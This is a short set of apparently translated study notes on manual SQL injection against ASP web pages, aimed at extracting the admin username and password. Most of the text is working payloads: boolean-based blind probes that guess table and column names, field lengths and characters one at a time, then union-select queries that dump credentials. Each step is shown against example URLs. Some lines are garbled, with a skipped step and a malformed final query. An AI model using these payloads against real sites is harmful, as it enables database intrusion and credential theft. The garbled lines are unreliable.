SQL injection, insert the sql command into the WEB form, or enter the domain name or the query string requested by the page, and finally deceive the server to execute malicious SQL commands;
get database username and password
1: Add { ' }[ and 1=1 ] and [and 1=2] to the link ending with, { .asp?id=32(any number) } in turn to determine whether there is an injection point.
2: [and exists(select*from admin)], guess the table name according to the results returned by the page.
3: [and exists (select admin from admin)], to guess the column name admin in the admin table.
4: [and (select top 1 len (admin) from admin)>1], to guess the field length.
5:【and (select top 1 asc(mid(admin,1,1))from admin)>97】
eg
find a website
HTTP://196.128.1.3:8008/onews.sap?id=40
1: http://196.128.1.3:8008/onews.sap?id=40 and 1=1 (the page displays fine)
2: http://196.128.1.3:8008/onews.sap?id=40 and 1=2 (shows database errors)
[1, 2, step display page has SQL injection]
3: HTTP://196.128.1.3:8008/onews.sap?id=40 and exists (select*from admin) [The page is displayed normally, indicating that the table name admin exists on this page]
4:HTTP://196.128.1.3:8008/onews.sap?id=40 and exists (select password from admin)【存在password】
5: HTTP://196.128.1.3:8008/onews.sap?id=40 and exists (select admin from admin)【存在admin】
6:
HTTP://196.128.1.3:8008/onews.sap?id=40 and (select top 1 len(admin) (或 password)from admin)>1
[Normal, indicating that the field of admin (or password) is the number after Dayu, (the numbers in the back become larger in turn until the page displays an error, which means that the maximum length of the field is this number)]
7:
HTTP://196.128.1.3:8008/onews.sap?id=40 and (select top 1 asc(mid(admin[or password],1[field in other locations],1))from admin)>97 [Size corresponding to other ASCLL]
[Until the page displays a database error, indicating the password or the admin letter in this position]
9: Repeat the above operation to get the admin and password of the page
Conjecture: Can code be used instead of manual injection, this is a repetitive process
joint injection
1: HTTP://192.168.1.3: 8008/onews.sap?id=36 order by 1 [Other numbers] [The total length of all characters in order by, if the page is not displayed normally, it means the total length of admin and password is]
2:
HTTP://192.168.1.3:8008/onews.sap?id=36 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
[The page displays 2 and 3, indicating that password and admin are located at positions 2 and 3, respectively.
4: HTTP: //192.168.1.3: 8008/
onews.sap?id=36 union select 1, admin, password 4, 5, 6, 7, 8, 9, 10, 11 from admin and password]